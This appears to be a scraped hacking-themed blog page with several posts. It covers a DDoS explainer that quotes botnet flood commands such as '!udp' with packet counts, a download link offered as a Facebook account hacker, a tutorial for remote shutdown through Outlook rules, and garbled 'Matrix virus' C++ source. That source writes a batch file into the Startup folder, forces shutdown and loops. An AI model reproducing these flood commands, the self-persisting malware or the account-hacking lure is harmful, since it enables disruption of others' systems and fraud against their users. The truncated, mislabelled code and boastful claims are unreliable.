the two networks together. The resulting scatternet can link together up to 10 piconets that are within range.

d dos attack

DDoS attacks are becoming more common, partly because of the Microsoft Windows operating system and its plethora of security holes. A DDoS or DoS is an attack launched at a certain target to deny its internet service. There is no difference between a DoS and DDoS except that a DDoS uses multiple sources. Hackers often attack a website or server using a DDoS to bring it "offline." These attacks are illegal! I know several network administrators that have dealt with a DDoS before and in most cases it is just annoying. Although these types of attacks do not destroy data or physically harm any equipment, they can cause an increase in bandwidth. Depending on the agreement of the target machine's ISP, this could mean a hefty bill. Network administrators spend hours on the phone with ISPs to stop a DDoS. Sometimes victims of a DDoS attack have done something to provoke an attack. A large DDoS attack that involved over 10,000 machines was launched against SCO, a company currently suing IBM, for 1 billion dollars over a dispute involving the Linux source code. However, some of the first major DDoS attacks were launched against .com successes such as Ebay, Amazon, and Yahoo in mid 2000. How Machines are Compromised... So how are these machines compromised? The most common way is through a trojan horse. If a trojan is loaded on your machine, it will run continuously unless you take certain actions to stop it. These programs are usually downloaded by users because they are commonly disguised as something else. There are TONS of these programs on Kazza, edonkey, etc. Historically, the first trojans were easy to spot. They usually had suspicious names and most virus scanners picked them up. Some of the trojans used today have been named carefully to pass as normal windows services. For example, RUNDLL32.EXE is used in conjunction with all kinds of windows program and installers. Hackers have developed a trojan named RUND1L32.EXE. Notice that the first "L" is really a "one." Common trojans come in variations of the Back Orifice, Backdoor.Trojan, Sub7 and others. What a Trojan Does... What does a trojan do? Once a machine is infected with a trojan, it reports "home." "Home" is usually an IRC channel. I'm not going to get into what IRC is. Personally, I think its one of the stupidest things ever created. It even has a few RFCs. Other machines infected will also enter the channel, and the hacker known as the "master" will send commands to the compromised machines known as "slaves" or "zombies." The master has the ability to send a multitude of commands. Many of the trojans have a real-time key logger. This can be used to record user names and passwords of anything including bank and email accounts. However, the hacker will most often just use the slaves to launch a DDoS attack. This can be done several ways. Ping of Death... The ping of death involves commanding the slaves to send a command such as !p4 192.168.0.1. This launches the same command that can be performed in windows by typing ping 192.168.0.1 -l 65500 -n 10000. This, in effect, pings the target machine 192.168.0.1 continuously [10,000 times] with 64 kBs of data. A ping command is not a problem because many programs will use an initial ping before connecting to a host. However, if this is done by multiple machines, the target machine can become congested with ping requests and will be unable to processes legit requests. UDP Flooding... When the master sends a !udp 207.71.92.193 9999999 0 command to the slaves, a true DDoS will occur. This command sends a flood of 9,999,999 very large UDP packets with no delay between each packet. Unlike the transmission of TCP packets, this command is specified to have "O" delay between each packet. This, in effect, will flood the targets bandwidth making it unable to process legit requests. The UDP attack is much worse than a ping attack. It also requires fewer clients to do damage. Tracing the Attack... Tracing the source of these attacks can be very hard or even impossible. Most of the time, the hackers launching these attacks know what they are doing and have taken the proper steps to protecting themselves. See telnet hacking for an example. Stopping a DDoS Attack... Stopping a DDoS attack can be tricky because the traffic comes from multiple sources. If the traffic is coming from one network, it is easy to create a rule in the router to expressly block traffic from that source. However, if the attack is coming from multiple networks, you may need the assistance of your ISP to redirect the traffic, create a filter, or change your communication channel.

facebook hacker

http://www.mediafire.com/?lnd11vdv30noddp hack the facebook id !!!!!!!! download from this link

Wednesday, March 14, 2012

Shutdown Computer with Your Cell Phone

Think about it …Shutting down the PC from your cell phone. Its cool naa.

There isn’t any rocket science involved in it .Follow the simple tricks below and voila…. 

The following trick was invented by some great students of Computer Science IIT Kanpur.TheFollowing trick makes it very easy for anyone to shutdown their pc’s remotely.

The requirements are simple….One cell phone with GPRS enabled, Microsoft Outlook on the pc to be put to shutdown.

Using this method the user can shutdown, restart, hibernate the computer just by sending an email from their cell phone.

All you need to have is Microsoft outlook which comes with Microsoft word. The Microsoft outlook should be installed on the pc you wish to shutdown.

First you need to create a batch file to perform shutdown etc .you can write them down yourself. 

* Open your notepad and type the following

c:\windows\system32\shutdown -s -f -t 00

And save it as shutdown.bat (Executable file)

* Open up Microsoft outlook .make sure that it is already configured for you email id.
* Now we will need to set Microsoft outlook in such a way that outlook checks you email every one minuite.This can be set by going to tools-à options
* Then click the mail setup tab and later send/receive button
* Make sure that you schedule an automatic send/receive...every box checked and set the number of minutes to 1.Now you may close all these dialog boxes
* Now go to tools---rules and alert. Next click on options button on the upper right hand corner and press the import rules button



* Now click on the shutdown.bat which you recently created
* Now the final step
* When you send the message from your phone to your email address with a subject shutdown or smsshutdown%% ......and VIOLA you computer is shutdown…. 

matrix virus very harmful


MAKING MOST DANGEROUS VIRUS CALLED MATRIX:::


Warning - Do not run it on your computer

I'm gonna teach you how to make a virus named Matrix...

1-Open notepad
2-Put in this code

#include
#include
#include
#include
#include
#include
#include
using namespace std;

int main()
{ keybd_event(VK_MENU,0x38,0,0);
keybd_event(VK_RETURN,0x1c,0,0);
keybd_event(VK_RETURN,0x1c,KEYEVENTF_KEYUP,0);
keybd_event(VK_MENU,0x38,KEYEVENTF_KEYUP,0);
HANDLE outToScreen;
outToScreen = GetStdHandle(STD_OUTPUT_HANDLE);

{
char buffer[255];
char inputFile[]="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\rawr.bat";
ifstream input(inputFile);
if (!input)
{
{
ofstream fp("C:\Documents and Settings\All Users\Start Menu\Programs\Startup\rawr.bat", ios::app);
fp
fp
fp
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
}
}
}

{
char buffer[255];
char inputFile[]="C:\rawr.exe";
ifstream input(inputFile);
if (!input)
{
{
{
ofstream fp("CLICK.bat", ios::app);
fp
fp
fp
fp
}
system("START CLICK.bat");
main();
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
system("call shutdown.exe -S");
goto START;
}
}
}

START:{
for(int i = 0; i < 1; i++)
{
int num = (rand() % 10);
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN | FOREGROUND_INTENSITY);
cout
cout
cout
cout
cout
cout
cout
cout
cout
cout
cout
cout
Sleep(60);
}
}
for ( int j = 0; j < 5; j++)
{
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN);
int number = (rand() % 24);
cout
}
goto START;



3-save it as matrix.bat
4-finish



AS IT WAS TOO DANGEROUS THE ACTUAL HEADER FILES FOR THIS SCRIPT ARE NOT GIVEN

AND IF U WANT TO TRY THIS SCRIPT U CAN JUST USE OF HEADER FILES SUCH AS STDIN,STDLIB,CONIO , AND STUFF LIKE THAT


IF U LIKE MY POST PLZ SAY THANKS TO ME